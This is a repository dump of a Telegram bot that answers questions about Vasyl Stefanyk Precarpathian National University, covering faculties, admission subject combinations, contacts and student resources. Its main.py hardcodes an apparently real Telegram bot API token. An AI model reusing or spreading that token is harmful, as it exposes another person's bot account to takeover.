"avg_line_length": 14.399999618530273, "blob_id": "396a74319a823a154c21a6bbd9fbee69075a28e6", "content_id": "a551f1f045c6cd42c9564fb8470b9dc2ef17a2a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": 
"no_license", "max_line_length": 31, "num_lines": 10, "path": "/Day5/In_Op/Io12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"r+\")\nb=a.read()\nprint b\nposition=a.tell()\nprint position\nposition=a.seek(0,10)\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6285714507102966, "avg_line_length": 14.666666984558105, "blob_id": "96cddf92c0670beb0181e2e09cc5b8e371788f16", "content_id": "71359bec345faaea63d59f7ab5c1bca9d71880c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/Day3/B/A.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def Amodule():\n print \"Amodule\"\ndef Bmodule():\n print \"Bmodule\"\ndef Cmodule():\n print \"Cmodule\"\n\ndef Dmodule():\n print \"Dmodule\"" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 23.25, "blob_id": "f1c3a77940eaef44fa9f6f33c54983c3d4cd8dba", "content_id": "4677860ff751c0829c2c3b5b0d2c3c8b86129424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/Day2/String/String12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize, center\na=\"hello world\"\nprint capitalize(a)\nprint a.center(15,'s')" }, { "alpha_fraction": 0.7054545283317566, "alphanum_fraction": 0.7236363887786865, "avg_line_length": 26.5, "blob_id": "caa3abd9af8672025e8d459856db8520e4e6455a", "content_id": "9e5b96a234a0743636fa7fb8c11e18e6492bb79b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": 
"/Day5/Database/MongoDb/Mongo1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\n\"\"\" list_collection_names() like table in sql\"\"\"\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\ncollist=mydb.list_collection_names()\nif \"custormers\" in collist:\n \n print \"collection exists\"\nelse:\n print \"error\"\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5259740352630615, "avg_line_length": 14.5, "blob_id": "b137f758c4d6f8a4961bbd163885b8fb3dc8de17", "content_id": "c445e0ab094c35f3ff87675f766bc7685719431f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 27, "num_lines": 10, "path": "/Day4/Class/Cls1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n def __init__(self,n):\n self.n=n\n \n def display(self,name):\n self.n=name\ns=sk(\"hello\")\ns1=sk(10)\nprint s.n\nprint s1.n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19, "blob_id": "27081970dbba7e7d90a8a649e474362f1ab748c5", "content_id": "cee6a17ea436350ed69dfc405c43fb7db836acb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/Day2/String/String10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint r\"c:\\\\etc\\init.d\"" }, { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6268656849861145, "avg_line_length": 16, "blob_id": "51d771a6fdd4a546e1a2d7958b6bf6a1d82a9bfd", "content_id": "b6c4623e35934d92803598811c4b182dacca3e14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": 
"/com/sk/sfile1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def adisplay():\n print \"adisplay\"\ndef vikas():\n print \"vikas\"" }, { "alpha_fraction": 0.34065935015678406, "alphanum_fraction": 0.5824176073074341, "avg_line_length": 9.222222328186035, "blob_id": "e159b7afaf62d0d331fa81cbd2f382cc076952e7", "content_id": "a76174a6d8cbf0f073e9a7284048e97289544eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/Day2/Tuple/Tup6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=20\na[0]=20\nprint a\nprint a[0:3]\na=[10,20,30,'hey']\nb=20\na[0]=b\nprint a" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.6138613820075989, "avg_line_length": 11.625, "blob_id": "e04ad191dee66f9063420374cb595ec49c328ff1", "content_id": "2bcb8af83dd9df699cb71c4bb21bd9b6255acd6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 101, "license_type": "no_license", "max_line_length": 18, "num_lines": 8, "path": "/Day2/Tuple/Tup1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\nprint min(a)\nprint max(a)\nprint cmp(a, b)\nc=list(a)\nprint c, type(c)\n" }, { "alpha_fraction": 0.5274725556373596, "alphanum_fraction": 0.6263736486434937, "avg_line_length": 22, "blob_id": "8165483ded261c7585d1f974a31fa48520cd6384", "content_id": "03786f0805bb4d0474d0cca9373785f29c6718f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/Day2/Dictionary/Dict7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\nprint a['name']\nprint a['id']\nprint a['contact']" }, { 
"alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 7, "blob_id": "f0408cc4f180ee252331ea15149108cda3f236ad", "content_id": "0244a4efd74043d94915366732f6fbaef14b50d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 14, "num_lines": 4, "path": "/Day2/Number/Num17.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nc=5\nb=complex(a,c)\nprint b\n\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.7432432174682617, "avg_line_length": 17.25, "blob_id": "2a351f2d39510b9ae0edab526aca0b0ba77ad753", "content_id": "7006fb6b3408b60c4318332f50a16601dbdbb16b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 74, "license_type": "no_license", "max_line_length": 31, "num_lines": 4, "path": "/Day2/Number/Random2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import random\na=20\nprint random.random()\nprint random.choice([10,20,30])\n\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6547619104385376, "avg_line_length": 20, "blob_id": "1af0de7f650f19a66fa3f00ed15018937c457c80", "content_id": "a5482f1e4cf180c51c9f4780ae2e6ee7811ac6d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/Day5/In_Op/Io4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"wr+\")\na.write(raw_input(\"Enter your String data: \"))\na.close()\na=open(\"myfile.txt\",\"wr+\")\nb=a.read()\nprint b\nprint \"file going to close\"\na.close()" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 8, "blob_id": "3748ae50f5af26e266bc093b7c0c290592236654", "content_id": 
"e57a2da6274b0161e49739eb5d872b9927229219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17, "license_type": "no_license", "max_line_length": 9, "num_lines": 2, "path": "/Day2/String/String2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a='hello'\nprint a" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 13.55555534362793, "blob_id": "565b146550476f5cd459f610fd46c869943e751b", "content_id": "70648a767c8c780535517852a487aa49d40243e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 27, "num_lines": 9, "path": "/Day4/Class/Cls4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n n=\"hello\"\n def display(self,name):\n self.n=name\ns=sk()\nprint s.n\ns.display(\"python\")\nprint (s.n)\nprint s.n" }, { "alpha_fraction": 0.41999998688697815, "alphanum_fraction": 0.5, "avg_line_length": 8.090909004211426, "blob_id": "d5289e655074a303d0e67d35b0bc20797a20ddee", "content_id": "f1e0c22a65415d0035b85bccf5c0b50ac79e2610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 12, "num_lines": 11, "path": "/Day2/Number/Num18.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=50.1\n'''abs(x)'''\nprint abs(a)\n\na=-50.1\n'''abs(x)'''\nprint abs(a)\n\na=50\n'''abs(x)'''\nprint abs(a)\n" }, { "alpha_fraction": 0.6743295192718506, "alphanum_fraction": 0.6743295192718506, "avg_line_length": 19.153846740722656, "blob_id": "6df223b0b24f94ecffa8a626d71d47829d8a3123", "content_id": "79ae2353fda49092706e510bad05426fefdf5637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", 
"max_line_length": 31, "num_lines": 13, "path": "/Day5/Database/mysqlDB/Db10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\n'''check database table'''\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"SAVANJI\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"SHOW TABLES \")\n\nfor a in cursor:\n print a" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 11.333333015441895, "blob_id": "e2bd46730897b7dbfe1a469582286faaaa6b16aa", "content_id": "e67f2ede44c7af6321d60b58ff8f6e53aef4ea4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num14.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6716417670249939, "avg_line_length": 6.55555534362793, "blob_id": "60c80320047292b55e79c8329ca1699f4f9af2f8", "content_id": "f658d8ede335dd6ca6bc8a27b3383b5b0050b468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 12, "num_lines": 9, "path": "/Day2/Number/Num16.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10+5j\nb=long(a)\nprint b\n\nb=float(a)\nprint b\n\nb=complex(a)\nprint b" }, { "alpha_fraction": 0.8627451062202454, "alphanum_fraction": 0.8627451062202454, "avg_line_length": 25, "blob_id": "eca54f4a1b3ab5c22d50070d282e63f77f157fc5", "content_id": "36c10e6f2fdaa4c4c6fc55c89c758ac9f094d1ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": 
"/Day3/Module/Phone/__init__.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from MsgFile import msg\nfrom music import musicplay" }, { "alpha_fraction": 0.5107913613319397, "alphanum_fraction": 0.5107913613319397, "avg_line_length": 16.375, "blob_id": "894300a0416be8fba69fde9b46824a65008b0b73", "content_id": "06e96791525aa4ff7c3f55b1c16cb5d224bc8bde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/Day3/Class/Cls1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class Mycls:\n def __init__(self):\n \"helo python\"\n def display():\n print \"hello\"\n \nMycls.__doc__\nMycls.display()\n" }, { "alpha_fraction": 0.6201117038726807, "alphanum_fraction": 0.6201117038726807, "avg_line_length": 21.125, "blob_id": "f99bc9b21ae2b25623bbd5cedcd49fe287db5d3c", "content_id": "3df9983d0781e02bf19f8c2f33c39679c5cbb136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/Day5/Exception/Excep6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"test.txt\",\"r\")\n a.write(\"hey this is python\")\nexcept:\n print \"cant not file and write the file\"\nelse:\n print \"file is succesfully write\"\n a.close() " }, { "alpha_fraction": 0.6304348111152649, "alphanum_fraction": 0.6521739363670349, "avg_line_length": 18.285715103149414, "blob_id": "b48d612b8624391d1b1865761a2f796c97273498", "content_id": "bf753f9732c96a536eaf5e8adb6bbf942d199902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/Day5/Exception/Excep2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": 
"try:\n a=10/0\n print a\nexcept ArithmeticError, a :\n print \"this statement is raising an exception\",a\nelse:\n print \"welcome\" " }, { "alpha_fraction": 0.5901639461517334, "alphanum_fraction": 0.5901639461517334, "avg_line_length": 14.5, "blob_id": "dda7388691781df3e76b4e8207ff39e9e5ba33e5", "content_id": "b56c7828d59ab263388eba6ddf094aa10127c986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 19, "num_lines": 4, "path": "/Vikas/A/afile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def display():\n print \"display\"\ndef dis():\n print \"dis\"" } ]
115
OksanaBukartyk/telegram-bot
https://github.com/OksanaBukartyk/telegram-bot
cb37916f702d69d548ca3da3aea8ca6e0fb817e6
dc84730a5c6fc635f865ee4927e386f551afc9e2
fbaea7a02aa9c861cd1c684c6189d02a12895262
refs/heads/main
2023-07-26T14:31:18.371696
2021-09-06T12:52:17
2021-09-06T12:52:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7245119214057922, "alphanum_fraction": 0.7375271320343018, "avg_line_length": 24.66666603088379, "blob_id": "92f97ec63fe0645b7ea7b642b607606f926a9880", "content_id": "61c4ce99fe88609592b566b693adf3391f9f647c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 461, "license_type": "no_license", "max_line_length": 87, "num_lines": 18, "path": "/README.md", "repo_name": "OksanaBukartyk/telegram-bot", "src_encoding": "UTF-8", "text": "# telegram-bot\nThe program works so far only after running on a local computer\n\n\nProject launch:\n\n1. Download Zip or write in terminal: $ git clone [email protected]:OksanaPetriv/telegram-bot.git\n2. install requirements: $ pip install -r requiremets.txt\n\nScreanshots:\n![start](screen/start.png)\n![start2](screen/start2.png)\n![abit](screen/ab.png)\n![stud](screen/stud.png)\n![zno](screen/zno.png)\n![zno2](screen/zno2.png)\n![chats](screen/chats.png)\n![exit](screen/exit.png)" }, { "alpha_fraction": 0.6273632049560547, "alphanum_fraction": 0.6547315716743469, "avg_line_length": 57.551204681396484, "blob_id": "754edfebf360fbb195b6c34ef195f61f8bd69d6d", "content_id": "880055617f436fb7dc7dfb2d5d7bb67da5114b83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44952, "license_type": "no_license", "max_line_length": 192, "num_lines": 664, "path": "/main.py", "repo_name": "OksanaBukartyk/telegram-bot", "src_encoding": "UTF-8", "text": "import telebot\nimport os\nPORT = int(os.environ.get('PORT', 5000))\nlupa=u'\\U0001F50D'\nbulavka=u'\\U0001F4CC'\nbacks=u'\\U000021A9'\nstrilky=u'\\U0001F53B'\nbooks=u'\\U0001F4DC'\nTOKEN='1968621740:AAGESlwAL0lvnSc-rS5etPhBUOc6MMcX7IU'\nbot = telebot.TeleBot (TOKEN)\nkeyboard1 = telebot.types.ReplyKeyboardMarkup(True)\nkeyboard1.row('Інформація про університет' )\nkeyboard1.row('Абітурієнт','Студент')\nkeyboard1.row('Вихід' )\n\[email 
protected]_handler(commands=['start'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Вітаю в Прикарпатському національному університеті імені '\n 'Василя Стефаника. \\nЯ постараюсь допомогти знайти тобі'\n ' всю неоюхідну інфомацію.', reply_markup=keyboard1)\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFkl7L6pcZSw0fQgOjiP9d77M__kzFAALTAANWnb0K9TKPl9US-T0ZBA')\[email protected]_handler(content_types=['text'])\ndef send_text(message):\n if message.text.lower() == 'інформація про університет':\n any_univer(message)\n\n\n elif message.text.lower() == 'вихід':\n bot.send_message(message.chat.id, 'Прощавай.')\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFll7L6t7YKtdXtod0VN-kgMOqjeQJAALkAANWnb0KFpvtj-7xNQQZBA')\n\n elif message.text.lower() == 'студент':\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFl17L6w_BZVk5Kb4ZT5tslV_SlGv-AALjAANWnb0KD_gizK2mCzcZBA')\n any_student(message)\n\n elif message.text.lower() == 'абітурієнт':\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKU17M9RnicWAbyeFTPRExXA36d9IYAALhAANWnb0KW8GUi0D406AZBA')\n any_abit(message)\n elif message.text == '123' or message.text=='132' or message.text== '213' or message.text=='231' or message.text=='321' or message.text=='312':\n f7 = open('Information/ЗНО/123.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '124' or message.text=='142' or message.text=='214' or message.text=='241' or message.text=='421' or message.text== '412':\n f7 = open('Information/ЗНО/124.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '125' or message.text=='152' or message.text=='215' or message.text=='251' or message.text=='521' or message.text=='512':\n f7 = open('Information/ЗНО/125.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '126' or 
message.text=='162' or message.text=='216' or message.text=='261' or message.text=='621' or message.text=='612':\n f7 = open('Information/ЗНО/126.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '134' or message.text=='143' or message.text=='314' or message.text=='341' or message.text=='431' or message.text=='413':\n f7 = open('Information/ЗНО/134.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '135' or message.text=='153' or message.text=='315' or message.text=='351' or message.text=='531' or message.text=='513':\n f7 = open('Information/ЗНО/135.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '136' or message.text=='163' or message.text=='316' or message.text=='361' or message.text=='631' or message.text=='613':\n f7 = open('Information/ЗНО/136.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '138' or message.text=='183' or message.text=='318' or message.text=='381' or message.text=='831' or message.text=='813':\n f7 = open('Information/ЗНО/138.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '145' or message.text=='154' or message.text=='415' or message.text=='451' or message.text=='541' or message.text=='514':\n f7 = open('Information/ЗНО/145.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '146' or message.text=='164' or message.text=='416' or message.text=='461' or message.text=='641' or message.text=='614':\n f7 = open('Information/ЗНО/146.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == 
'147' or message.text=='174' or message.text=='417' or message.text=='471' or message.text=='741' or message.text=='714':\n f7 = open('Information/ЗНО/147.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '148' or message.text=='184' or message.text=='418' or message.text=='481' or message.text=='841' or message.text=='814':\n f7 = open('Information/ЗНО/148.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '156' or message.text=='165' or message.text=='516' or message.text=='561' or message.text=='651' or message.text=='615':\n f7 = open('Information/ЗНО/156.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '157' or message.text=='175' or message.text=='517' or message.text=='571' or message.text=='751' or message.text=='715':\n f7 = open('Information/ЗНО/157.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '158' or message.text=='185' or message.text=='518' or message.text=='581' or message.text=='851' or message.text=='815':\n f7 = open('Information/ЗНО/158.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '187' or message.text=='178' or message.text=='418' or message.text=='871' or message.text=='781' or message.text=='718':\n f7 = open('Information/ЗНО/187.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n else:\n bot.send_message(message.chat.id, 'Не коректний ввід')\n\[email protected]_handler(content_types=['sticker'])\ndef sticker_id(message):\n print(message)\n\[email protected]_handler(commands = ['url']) # ДЛя ссилки на сайт\ndef url(message, url, text, message_text):\n markup = 
telebot.types.InlineKeyboardMarkup()\n btn_my_site= telebot.types.InlineKeyboardButton(text=text, url=url)\n markup.add(btn_my_site)\n bot.send_message(message.chat.id, message_text, reply_markup = markup)\n\[email protected]_handler(content_types=[\"text\"])\ndef any_msg(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFrV7L69XLp2AswXQH1yWxDuxujPVvAALYAANWnb0KiQndv0vxFCcZBA')\n btn1 = telebot.types.InlineKeyboardButton(text='Економічний факультет', callback_data='економічний')\n btn2 = telebot.types.InlineKeyboardButton(text='Педагогічний факультет', callback_data='педагогічний')\n btn3 = telebot.types.InlineKeyboardButton(text='Факультет іноземних мов', callback_data='іноземних мов')\n btn4 = telebot.types.InlineKeyboardButton(text='Філософський факультет', callback_data='філософський')\n btn5 = telebot.types.InlineKeyboardButton(text='Факульмет математики та інформатики', callback_data='математики і інформатики')\n btn6 = telebot.types.InlineKeyboardButton(text='Факультет філології', callback_data='філології')\n btn7 = telebot.types.InlineKeyboardButton(text='Факультет туризму', callback_data='туризму')\n btn8 = telebot.types.InlineKeyboardButton(text='Фізико-технічний факультет', callback_data='фізико-технічний')\n btn9 = telebot.types.InlineKeyboardButton(text='Факульмет історії, політології і міжнародних відносин', callback_data='історії, політології...')\n btn10 = telebot.types.InlineKeyboardButton(text='Факультет природничих наук', callback_data='природничих наук')\n btn11 = telebot.types.InlineKeyboardButton(text='Факультет фізичного виховання і спорту', callback_data='фіз.виховання і спорту')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n keyboard.add(btn9)\n keyboard.add(btn10)\n keyboard.add(btn11)\n bot.send_message(message.chat.id, text='Факультети:', 
reply_markup=keyboard)\n backend(message, 'Back4.4')\[email protected]_query_handler(func=lambda call: True)\ndef callback_inline(call):\n textFac = 'Веб-сайт факультету'\n textInst='Веб-сайт інституту'\n textKol='Веб-сайт коледжу'\n message_textFac = 'Бажаєш перейти на веб сайт? - натисни кнопку нище:'\n if call.message:\n if call.data == 'математики і інформатики':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Математики.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://mif.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'економічний':\n strily(call.message, call.data)\n f6 = open('Information/Факультети/Економічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://econ.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'педагогічний':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Педагогічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://pedagogical.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'іноземних мов':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ІноземнихМов.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://fim.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'філософський':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Філософський.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://philosophical.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'філології':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Філології.txt', 'r')\n 
bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://philology.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'туризму':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Туризму.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ft.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'фізико-технічний':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Фізико-технічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ftf.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'історії, політології...':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ІсторіїПолітології.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ipmv.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'фіз.виховання і спорту':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ФізичногоВиховання.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ffvs.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'природничих наук':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ПриродничихНаук.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://fpn.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n\n elif call.data == 'Історія':\n strily(call.message,call.data)\n f6 = open('Information/Університет/Історія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://pnu.edu.ua/історія/', books+' Історія', 'Для більш 
детальної інформації переходь сюди:')\n backend(call.message, 'Back1')\n elif call.data == 'Підрозділи':\n strily(call.message,call.data)\n any_units(call.message)\n elif call.data == 'Інститути':\n strily(call.message,call.data)\n any_insityt(call.message)\n elif call.data == 'Факультети':\n strily(call.message,call.data)\n any_msg(call.message)\n elif call.data == 'Коледж':\n strily(call.message,call.data)\n f7 = open('Information/Коледж/Коледж.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f7.read())\n url(call.message, 'https://ifk.pnu.edu.ua/', textKol, message_textFac)\n backend(call.message, 'Back4.4')\n elif call.data == 'Контакти':\n strily(call.message,call.data)\n any_contacts(call.message)\n #bot.send_message(call.message.chat.id, 'Телефонний довідник\\n\\n')\n url(call.message, 'https://pnu.edu.ua/', 'Веб-сайт університету', 'Якщо ви бажаєте перейти на сайт'\n ' Прикарпатського університету - натисніть кнопку нище:')\n backend(call.message, 'Back1')\n\n\n elif call.data=='Навчальний процес':\n strily(call.message,call.data)\n url(call.message, 'https://nmv.pnu.edu.ua/wp-content/uploads/sites/118/2019/07/розпорядження-95-р.pdf',\n 'Графік навч. процесу', 'Графік навч. процесу на 2019-2020рік можна знайти за посиланням:')\n backend(call.message,'Back2')\n elif call.data=='Наукова бібліотека':\n strily(call.message,call.data)\n f7 = open('Information/Університет/НауковаБібліотека.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f7.read())\n bot.send_message(chat_id=call.message.chat.id, text='Адрес: вул. 